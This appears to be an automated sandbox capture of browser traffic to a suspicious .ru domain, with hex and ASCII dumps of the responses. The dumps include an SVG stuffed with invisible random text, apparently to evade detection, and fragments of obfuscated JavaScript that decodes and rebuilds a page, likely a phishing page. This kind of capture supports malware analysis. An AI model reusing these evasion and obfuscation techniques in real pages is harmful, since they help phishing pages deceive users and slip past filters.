                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LD7708lsRXDc%2FXwTOJR%2BXlhPs%2Bf7zK8e5Op4XMczZnXv%2BcQ9atDglpEP0zARjdAqdGnDM1L0z2ShKUbpdo9qnjfhh9QoKdC5c4PVqAj78kDWz0%2BmYxLpd116Yv8ftNGe3PQPXFjvapg8XLOtyJoThl7oKqo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d9ead584539-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:16 UTC645INData Raw: 31 38 31 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 33 6c 74 76 52 74 43 7a 77 5a 76 6b 5a 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73 74 79
                                                                                                                                                                                    Data Ascii: 1818<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">3ltvRtCzwZvkZ</text><g opacity=".2" clip-path="url(#E)"><text sty
                                                                                                                                                                                    2024-01-26 13:42:16 UTC1369INData Raw: 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 61 5a 68 68 31 34 4e 59 49 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38
                                                                                                                                                                                    Data Ascii: "/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">aZhh14NYI</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 18
                                                                                                                                                                                    2024-01-26 13:42:16 UTC1369INData Raw: 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 41 43 45 57 79 47 71 53 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d
                                                                                                                                                                                    Data Ascii: 0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ACEWyGqS</text><text style=
                                                                                                                                                                                    2024-01-26 13:42:16 UTC1369INData Raw: 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 38 31 59 78 56 67 39 6c 74 37 31 34 67 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77
                                                                                                                                                                                    Data Ascii: /text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">81YxVg9lt714g</text></radialGradient><text style="display: inline; color: #1A7D75; max-w
                                                                                                                                                                                    2024-01-26 13:42:16 UTC1369INData Raw: 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 51 59 65 76 67 76 6e 4a 61 4f 34 64 68 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65
                                                                                                                                                                                    Data Ascii: stop stop-color="#d83b01" stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">QYevgvnJaO4dh</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline
                                                                                                                                                                                    2024-01-26 13:42:16 UTC55INData Raw: 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 68 49 56 70 62 6f 37 49 54 53 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: : 0.03px; font-size: 0.02px;">hIVpbo7ITS</text></svg>
                                                                                                                                                                                    2024-01-26 13:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    73192.168.2.1649826104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:21 UTC901OUTGET /VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/30VyqDe0V3
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:22 UTC738INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:22 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xR1xCJfh0jfr4MRg7E4rEwMxy4mEvhw8FqMHKCAok5%2BHfGappA71BU0y8USyVfQgF7xMIcC5ANfdUxp5lBVs9tyoniTaYT9y6WW78jIPmBXxCutCX08%2FzLWkViyzHnFwl4z4miS0EpwIIooOMAp%2Bgvu2Lxc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dc3383d6735-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:22 UTC593INData Raw: 32 34 61 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 4d 6d 52 41 49 56 47 5a 52 6c 72 78 4f 20 3d 20 27 69 42 6e 4e 50 65 73 72 76 49 73 72 52 4f 73 27 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 62 78 43 45 5a 77 49 71 62 6a 45 64 50 28 44 74 4e 6e 76 56 6b 74 61 50 67 2c 20 6e 65 68 42 6e 4a 4a 55 51 66 4f 29 20 7b 0d 0a 09 6c 65 74 20 50 4a 76 71 53 4c 69 47 67 43 57 69 41 50 71 20 3d 20 27 27 3b 0d 0a 09 44 74 4e 6e 76 56 6b 74 61 50 67 20 3d 20 61 74 6f 62 28 44 74 4e 6e 76 56 6b 74 61 50 67 29 3b 0d 0a 09 6c 65 74 20 52 6d 4b 56 71 6e 5a 68 63 58 77 5a 20 3d 20 6e 65 68 42 6e 4a 4a 55 51 66 4f 2e 6c 65 6e 67 74 68 3b 0d 0a 0d 0a 09 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 44 74 4e 6e 76 56 6b 74 61 50 67 2e 6c 65 6e 67 74 68 3b 20 69
                                                                                                                                                                                    Data Ascii: 24a<script>var MmRAIVGZRlrxO = 'iBnNPesrvIsrROs';function bxCEZwIqbjEdP(DtNnvVktaPg, nehBnJJUQfO) {let PJvqSLiGgCWiAPq = '';DtNnvVktaPg = atob(DtNnvVktaPg);let RmKVqnZhcXwZ = nehBnJJUQfO.length;for (let i = 0; i < DtNnvVktaPg.length; i
                                                                                                                                                                                    2024-01-26 13:42:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    74192.168.2.1649825104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:22 UTC697OUTGET /VyRsmGftiIlOxrabXBIOtQtS/0AAZf0BPQd1iVI?er HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:22 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:22 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WpYojtOcPPLNy1kj0Zw0GKvwyt0DWF0wKDZ95xqSJ1sgHvHSa8Bj6B1RjBLgHLwJtlAjRPXmAi2G3RFimB4bsX9vi52FlwIvoOZgRIu0Fj1mtbCuWV77BGXEmLUYRCwESVDTPPR%2Bq0SdEIbuAZluyO3e8xo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dc57e1a7bbd-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:22 UTC637INData Raw: 37 63 64 32 0d 0a 76 61 72 20 74 4f 6f 67 7a 67 4a 56 6f 52 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 30 5d 20 3d 20 36 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 5d 20 3d 20 33 33 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 5d 20 3d 20 36 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 5d 20 3d 20 37 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 5d 20 3d 20 36 37 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 5d 20 3d 20 38 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 36 5d 20 3d 20 38 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 37 5d 20 3d 20 38 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 38 5d 20 3d 20 36 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 5d 20 3d 20 33 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 30 5d 20 3d 20 31 30 34 3b
                                                                                                                                                                                    Data Ascii: 7cd2var tOogzgJVoR = new Array;tOogzgJVoR[0] = 60;tOogzgJVoR[1] = 33;tOogzgJVoR[2] = 68;tOogzgJVoR[3] = 79;tOogzgJVoR[4] = 67;tOogzgJVoR[5] = 84;tOogzgJVoR[6] = 89;tOogzgJVoR[7] = 80;tOogzgJVoR[8] = 69;tOogzgJVoR[9] = 32;tOogzgJVoR[10] = 104;
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 38 5d 20 3d 20 31 31 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 39 5d 20 3d 20 33 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 30 5d 20 3d 20 33 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 31 5d 20 3d 20 31 30 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 32 5d 20 3d 20 39 37 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 33 5d 20 3d 20 31 31 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 34 5d 20 3d 20 31 30 33 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 35 5d 20 3d 20 36 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 36 5d 20 3d 20 33 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 37 5d 20 3d 20 31 30 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 38 5d 20 3d 20 31 31 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 39 5d 20 3d 20 33 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f
                                                                                                                                                                                    Data Ascii: 8] = 114;tOogzgJVoR[29] = 34;tOogzgJVoR[30] = 32;tOogzgJVoR[31] = 108;tOogzgJVoR[32] = 97;tOogzgJVoR[33] = 110;tOogzgJVoR[34] = 103;tOogzgJVoR[35] = 61;tOogzgJVoR[36] = 34;tOogzgJVoR[37] = 101;tOogzgJVoR[38] = 110;tOogzgJVoR[39] = 34;tOogzgJVo
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 32 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 33 5d 20 3d 20 31 30 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 34 5d 20 3d 20 31 31 36 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 35 5d 20 3d 20 31 30 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 36 5d 20 3d 20 34 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 37 5d 20 3d 20 33 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 38 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 39 39 5d 20 3d 20 31 31 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 30 30 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 30 31 5d 20 3d 20 31 31 36 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 30 32 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f
                                                                                                                                                                                    Data Ascii: 9;tOogzgJVoR[92] = 105;tOogzgJVoR[93] = 100;tOogzgJVoR[94] = 116;tOogzgJVoR[95] = 104;tOogzgJVoR[96] = 44;tOogzgJVoR[97] = 32;tOogzgJVoR[98] = 105;tOogzgJVoR[99] = 110;tOogzgJVoR[100] = 105;tOogzgJVoR[101] = 116;tOogzgJVoR[102] = 105;tOogzgJVo
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 35 33 5d 20 3d 20 39 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 35 34 5d 20 3d 20 38 33 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 35 35 5d 20 3d 20 39 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 35 36 5d 20 3d 20 37 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 35 37 5d 20 3d 20 38 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 35 38 5d 20 3d 20 31 31 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 35 39 5d 20 3d 20 31 31 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 36 30 5d 20 3d 20 31 30 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 36 31 5d 20 3d 20 31 30 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 36 32 5d 20 3d 20 31 30 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 31 36 33 5d 20 3d 20 35 33 3b 0a 74 4f 6f 67 7a 67
                                                                                                                                                                                    Data Ascii: ;tOogzgJVoR[153] = 98;tOogzgJVoR[154] = 83;tOogzgJVoR[155] = 90;tOogzgJVoR[156] = 70;tOogzgJVoR[157] = 81;tOogzgJVoR[158] = 112;tOogzgJVoR[159] = 111;tOogzgJVoR[160] = 109;tOogzgJVoR[161] = 108;tOogzgJVoR[162] = 104;tOogzgJVoR[163] = 53;tOogzg
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 6f 52 5b 32 31 33 5d 20 3d 20 31 32 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 31 34 5d 20 3d 20 31 31 36 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 31 35 5d 20 3d 20 34 37 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 31 36 5d 20 3d 20 31 30 36 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 31 37 5d 20 3d 20 39 37 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 31 38 5d 20 3d 20 31 31 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 31 39 5d 20 3d 20 39 37 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 32 30 5d 20 3d 20 31 31 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 32 31 5d 20 3d 20 39 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 32 32 5d 20 3d 20 31 31 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 32 33 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 32 34
                                                                                                                                                                                    Data Ascii: oR[213] = 120;tOogzgJVoR[214] = 116;tOogzgJVoR[215] = 47;tOogzgJVoR[216] = 106;tOogzgJVoR[217] = 97;tOogzgJVoR[218] = 118;tOogzgJVoR[219] = 97;tOogzgJVoR[220] = 115;tOogzgJVoR[221] = 99;tOogzgJVoR[222] = 114;tOogzgJVoR[223] = 105;tOogzgJVoR[224
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 56 6f 52 5b 32 37 34 5d 20 3d 20 31 30 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 37 35 5d 20 3d 20 31 30 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 37 36 5d 20 3d 20 36 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 37 37 5d 20 3d 20 33 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 37 38 5d 20 3d 20 31 30 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 37 39 5d 20 3d 20 31 31 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 38 30 5d 20 3d 20 31 31 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 38 31 5d 20 3d 20 31 31 36 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 38 32 5d 20 3d 20 31 30 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 38 33 5d 20 3d 20 31 31 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32 38 34 5d 20 3d 20 34 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 32
                                                                                                                                                                                    Data Ascii: VoR[274] = 108;tOogzgJVoR[275] = 101;tOogzgJVoR[276] = 62;tOogzgJVoR[277] = 35;tOogzgJVoR[278] = 102;tOogzgJVoR[279] = 111;tOogzgJVoR[280] = 111;tOogzgJVoR[281] = 116;tOogzgJVoR[282] = 101;tOogzgJVoR[283] = 114;tOogzgJVoR[284] = 44;tOogzgJVoR[2
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 34 5d 20 3d 20 31 31 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 33 35 5d 20 3d 20 31 30 33 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 33 36 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 33 37 5d 20 3d 20 31 31 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 33 38 5d 20 3d 20 35 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 33 39 5d 20 3d 20 34 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 34 30 5d 20 3d 20 33 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 34 31 5d 20 3d 20 39 37 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 34 32 5d 20 3d 20 31 31 37 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 34 33 5d 20 3d 20 31 31 36 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 34 34 5d 20 3d 20 31 31 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 34 35 5d 20 3d 20 35
                                                                                                                                                                                    Data Ascii: 4] = 114;tOogzgJVoR[335] = 103;tOogzgJVoR[336] = 105;tOogzgJVoR[337] = 110;tOogzgJVoR[338] = 58;tOogzgJVoR[339] = 48;tOogzgJVoR[340] = 32;tOogzgJVoR[341] = 97;tOogzgJVoR[342] = 117;tOogzgJVoR[343] = 116;tOogzgJVoR[344] = 111;tOogzgJVoR[345] = 5
